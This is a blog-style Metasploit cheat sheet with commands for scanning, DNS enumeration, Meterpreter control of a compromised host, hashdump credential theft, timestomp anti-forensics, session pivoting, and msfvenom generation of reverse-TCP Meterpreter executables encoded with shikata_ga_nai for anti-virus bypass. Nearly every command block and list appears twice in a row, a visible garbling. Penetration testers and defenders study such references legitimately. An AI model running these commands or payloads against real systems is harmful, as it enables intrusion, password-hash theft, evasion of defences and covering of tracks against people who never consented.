Metasploit Tools And Cheat Sheet
Metasploit is an open source computer security project. Metasploit is not a single tool but a framework which is used for developing and executing exploit code against the Remote Target. Using Metasploit we can exploit most of the vulnerabilities that exist in a software and that is the only reason that makes us point out the Metasploit Tools And Cheat Sheet for the HACKAGON‘s readers.
The purpose of this Metasploit Tools And Cheat Sheet is to describe some common options for some of the various components of the Metasploit Framework.
Tools Described
Metasploit: The Metasploit Framework is a development platform for developing and using security tools and exploits.
Metasploit Meterpreter: The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
Metasploit msfvenom: The msfvenom tool is a component of the Metasploit Framework that allows users to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Ruby script, and raw shellcode. The msfvenom tool can also encode payloads to help avoid detection.
Meterpreter Post Modules
With an available Meterpreter session, post modules can be run on the target machine.
Post Modules from Meterpreter
meterpreter > run post/multi/gather/env
meterpreter > run post/multi/gather/env
Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run
Useful Auxiliary Modules
Port Scanner
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server
msf > use auxiliary/server/socks4
msf > run
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route and use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.
Metasploit Console Basics (msfconsole)
Search for module
msf > search [regex]
msf > search [regex]
Specify and exploit to use
msf > use exploit/[ExploitPath]
msf > use exploit/[ExploitPath]
Specify a Payload to use
msf > set PAYLOAD [PayloadPath]
msf > set PAYLOAD [PayloadPath]
Show options for the current modules
msf > show options
msf > show options
Set options
msf > set [Option] [Value]
msf > set [Option] [Value]
Start exploit
msf > exploit
msf > exploit
Metasploit Meterpreter
Base Commands
? / help: Displays a summary of commands.
exit / quit: Exit the Meterpreter session.
sysinfo: Shows the system name and OS type.
shutdown / reboot: Self-explanatory.
exit / quit: Exit the Meterpreter session.
sysinfo: Shows the system name and OS type.
shutdown / reboot: Self-explanatory.
File System Commands
cd: Changes the directory.
lcd: Changes directory on local (attacker’s) machine.
pwd / getwd: Displays current working directory.
ls: Shows the contents (List) of the directory.
cat: Displays the contents of a file on the screen.
download / upload: Move files to/from the target machine.
mkdir / rmdir: Make / remove directory.
edit: Open a file in the default editor (typically vi).
lcd: Changes directory on local (attacker’s) machine.
pwd / getwd: Displays current working directory.
ls: Shows the contents (List) of the directory.
cat: Displays the contents of a file on the screen.
download / upload: Move files to/from the target machine.
mkdir / rmdir: Make / remove directory.
edit: Open a file in the default editor (typically vi).
Process Commands
getpid: Displays the process ID that Meterpreter is running inside.
getuid: Displays the user ID that Meterpreter is running with.
ps: Displays process list.
kill: Terminates a process given its process ID.
execute: Runs a given program with the privileges of the process, the Meterpreter is loaded in.
migrate: Jump to a given destination process ID.
– Target process must have same or lesser privileges.
– Target process may be a more stable process.
– When inside a process, can access any files that the process has a lock on.
getuid: Displays the user ID that Meterpreter is running with.
ps: Displays process list.
kill: Terminates a process given its process ID.
execute: Runs a given program with the privileges of the process, the Meterpreter is loaded in.
migrate: Jump to a given destination process ID.
– Target process must have same or lesser privileges.
– Target process may be a more stable process.
– When inside a process, can access any files that the process has a lock on.
Network Commands
ipconfig: Shows network interface information.
portfwd: Forward packets through TCP session.
route: Manage/view the system’s routing table.
portfwd: Forward packets through TCP session.
route: Manage/view the system’s routing table.
Misc Commands
idletime: Displays the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enables/disables either the mouse or keyboard of the target machine.
screenshot: Saves the screenshot of the target machine.
uictl [enable/disable] [keyboard/mouse]: Enables/disables either the mouse or keyboard of the target machine.
screenshot: Saves the screenshot of the target machine.
Additional Modules
use [module]: Loads the specified module.
Example
use priv: Loads the previous module.
hashdump: Dump the hashes from the box.
timestomp: Alter NTFS file timestamps.
use priv: Loads the previous module.
hashdump: Dump the hashes from the box.
timestomp: Alter NTFS file timestamps.
Metasploit msfvenom
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Runs with ‘‘-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse connection)]
LPORT=[LocalPort]
–f [FormatType]
LHOST=[LocalHost (if reverse connection)]
LPORT=[LocalPort]
Example Reverse Meterpreter payload as an executable and redirected to a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
Format Options (specified with –f)
–help-formats: List available output formats
exe: Executable
pl: Perl
rb: Ruby
raw: Raw shellcode
c: C code
exe: Executable
pl: Perl
rb: Ruby
raw: Raw shellcode
c: C code
Encoding Payloads with msfvenom: The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse connection.)]
LPORT=[LocalPort]
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse connection.)]
LPORT=[LocalPort]
Example: Encode a payload from msfpayload 5 times using shikata_ga_nai encoder and output as executable
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Managing Sessions
Multiple Exploitation
Run the exploit expecting a single session that is immediately backgrounded
msf > exploit -z
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded
msf > exploit –j
msf > exploit –j
List all current jobs (usually exploit listeners)
msf > jobs –l
msf > jobs –l
Kill a job
msf > jobs –k [JobID]
msf > jobs –k [JobID]
Multiple Sessions
List all backgrounded sessions
msf > sessions -l
msf > sessions -l
Interact with a backgrounded session:
msf > session -i [SessionID]
msf > session -i [SessionID]
Background the current interactive session:
meterpreter > <Ctrl+Z> (OR meterpreter > background)
meterpreter > <Ctrl+Z> (OR meterpreter > background)
Routing Through Sessions
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.
So, we hope that we provided some useful knowledge about Metasploit & it’s Tools used for Hacking so that readers can begin their Hacking career with an ease. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.
No comments:
Post a Comment